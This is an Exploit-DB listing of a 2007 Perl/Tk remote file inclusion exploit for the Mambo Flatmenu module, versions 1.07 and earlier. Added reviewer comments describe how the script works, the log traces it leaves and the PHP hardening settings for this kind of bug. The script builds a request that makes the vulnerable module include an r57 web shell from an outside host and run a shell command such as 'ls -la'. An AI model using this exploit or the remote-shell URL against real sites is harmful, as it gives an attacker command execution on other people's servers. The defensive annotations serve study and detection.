Mambo Module Flatmenu <= 1.07 - Remote File Include Exploit

2007-03-25T00:00:00
ID EDB-ID:3567
Type exploitdb
Reporter Cold Zero
Modified 2007-03-25T00:00:00

Description

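Remote file inclusion (RFI) exploit for the Mambo Flatmenu module, versions <= 1.07 (CVE-2007-1702). Category: web application exploit, PHP platform. The listing below targets the `mosConfig_absolute_path` request parameter of `modules/mod_flatmenu.php`. Requests to that file whose parameter value is an absolute URL are the trace to look for in web server logs.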

                                        
                                            #!/usr/bin/perl

#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-   - - [The Best Arab Security And Hacking Team] - -
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Mambo 4.5.1 Modules Flatmenu <= 1.07 Remote File Include Exploit
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- [Script name: Flatmenu 1.07 for Mambo 4.5.1
#- [Script site: http://mamboxchange.com/frs/download.php/2376/Flatmenu10b07_451_1.zip
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-            Coded And Found By Coldz3ro
#-           Cold-z3ro[at]hotmail[dot]com
#-                 Ilove You HanaH
#+      Big thanks For You My Love Greeneyes_Amor
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use Tk;
use Tk::DialogBox;
use LWP::UserAgent;

# Main window and default field values for a small Tk front end.
# NOTE(review): the `-&gt;`, `=&gt;` and `&lt;=` sequences in this listing are
# HTML-escaped `->`, `=>` and `<=` left over from page extraction.
# The script has no `use strict` / `use warnings`; every variable below is a
# package global that the button callback `akcja` reads later.
$mw = new MainWindow(title =&gt; "Team Hell Crew :: Mambo 4.5.1 Modules Flatmenu &lt;= 1.07 Remote File Include Exploit :: by Cold z3ro ;-)  " );
# Fixed 500x300 window; resizing is disabled in both directions.
$mw-&gt;geometry ( '500x300' ) ;
$mw-&gt;resizable(0,0);

# Heading label followed by an empty spacer label.
$mw-&gt;Label(-text =&gt; 'Mambo 4.5.1 Modules Flatmenu &lt;= 1.07 Remote File 
Include Exploit', -font =&gt; '{Verdana} 7 bold',-foreground=&gt;'blue')-&gt;pack();
$mw-&gt;Label(-text =&gt; '')-&gt;pack();

# Two side-by-side frames: captions go in $fleft, entry fields in $fright.
$fleft=$mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'ne') ;
$fright=$mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'nw') ;

# Default values shown in the three entry fields.
# $url is a placeholder request to modules/mod_flatmenu.php ending in the
# `mosConfig_absolute_path=` parameter. Going by the advisory title, that
# parameter presumably reaches a PHP include in the module.
# Defender view: a request to mod_flatmenu.php whose mosConfig_absolute_path
# value starts with a URL scheme (http://, ftp://, ...) is the log indicator.
# PHP's `allow_url_include = Off` and `register_globals = Off` are the generic
# hardening settings for this bug class. Whether this module depends on
# register_globals is not shown on this page, so confirm against the module.
$url = 'http://www.site.com/[Mambo_path]/modules/mod_flatmenu.php?mosConfig_absolute_path=';
# $shell_path is the remote URL supplied as the parameter value.
$shell_path = 'http://nachrichtenmann.de/r57.txt?';
# $cmd is appended verbatim after $shell_path when the URL is assembled.
$cmd = 'ls -la';


# Input form: one caption (left frame) and one Entry (right frame) per value.
# Each Entry is bound with -textvariable to a global ($url, $shell_path, $cmd),
# so whatever is typed in the GUI is what the button callback later reads.
$fleft-&gt;Label ( -text =&gt; 'Script Path: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$url) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fleft-&gt;Label ( -text =&gt; 'Shell Path: ', -font =&gt; '{Verdana} 8 bold' ) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$shell_path) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fleft-&gt;Label ( -text =&gt; 'CMD: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$cmd) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

# Blank spacer labels in both frames.
$fright-&gt;Label( -text =&gt; ' ')-&gt;pack();
$fleft-&gt;Label( -text =&gt; ' ')-&gt;pack();



# The only action in the UI: clicking this button invokes `akcja`.
$fright-&gt;Button(-text    =&gt; 'Exploit Include Vulnerability',
               -relief =&gt; "groove",
               -width =&gt; '30',
               -font =&gt; '{Verdana} 8 bold',
               -activeforeground =&gt; 'red',
               -command =&gt; \&akcja
              )-&gt;pack();


# Author credit and greeting labels; they have no effect on the request.
$fright-&gt;Label( -text =&gt; ' ')-&gt;pack();
$fright-&gt;Label( -text =&gt; 'Exploit Coded By Cold z3ro [Wasem898]', -font =&gt; '{Verdana} 7')-&gt;pack();
$fright-&gt;Label( -text =&gt; 'Team Hell Crew :: The Best Arab Security And Hacking Team', -font =&gt; '{Verdana} 7')-&gt;pack();
$fright-&gt;Label( -text =&gt; 'Cold-z3ro@hotmail.com', -font =&gt; '{Verdana} 7')-&gt;pack();
$fright-&gt;Label( -text =&gt; ' Long Life My Home Land Palestine', -font =&gt; '{Verdana} 7')-&gt;pack();
$fright-&gt;Label( -text =&gt; ' ~~\Big thanks For You My Love Greeneyes_Amor/~~', -font =&gt; '{Verdana} 7')-&gt;pack();
# Enter the Tk event loop. `akcja` is defined below this call, but Perl
# compiles named subs before run time, so the callback reference resolves.
MainLoop();

# Button callback: builds an informational dialog, hands the assembled URL to
# the operating system, then shows the dialog.
#
# The script sends no HTTP request itself. It concatenates the globals $url,
# $shell_path and $cmd verbatim and passes "start <url>" to system().
# `start` is presumably the Windows cmd built-in that opens the default
# handler (a browser), which would make the script Windows-only as written.
#
# NOTE(review): this is the single-string form of system(), which goes through
# the system shell when the string contains shell metacharacters, and the
# default URL does. Anything typed into the three entry fields is therefore
# interpreted by the local shell of whoever runs the tool. Treat this listing
# as unsafe to execute on an analysis workstation.
# The return value of system() is not checked, so the dialog appears
# regardless of whether anything was launched.
sub akcja()
{
# Dialog contents are static contact/credit text only.
$InfoWindow=$mw-&gt;DialogBox(-title   =&gt; 'Team Hell Crew :: Exploit by Cold 
z3ro ;-) ', -buttons =&gt; ["OK"]);
$InfoWindow-&gt;add('Label', -text =&gt; ' For help Cold-z3ro@hotmail.com #Team Hell', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; 'Team Hell Site: http://www.Hack-teach.com/', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; 'Greetz For my friends ;-)', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;

# Hand the concatenated string to the OS shell (see the note above the sub).
system("start $url$shell_path$cmd");
# Show() blocks until the dialog's OK button is pressed.
$InfoWindow-&gt;Show();
}
# www.Hack-Teach.com , www.4azhar.com ]

# milw0rm.com [2007-03-25]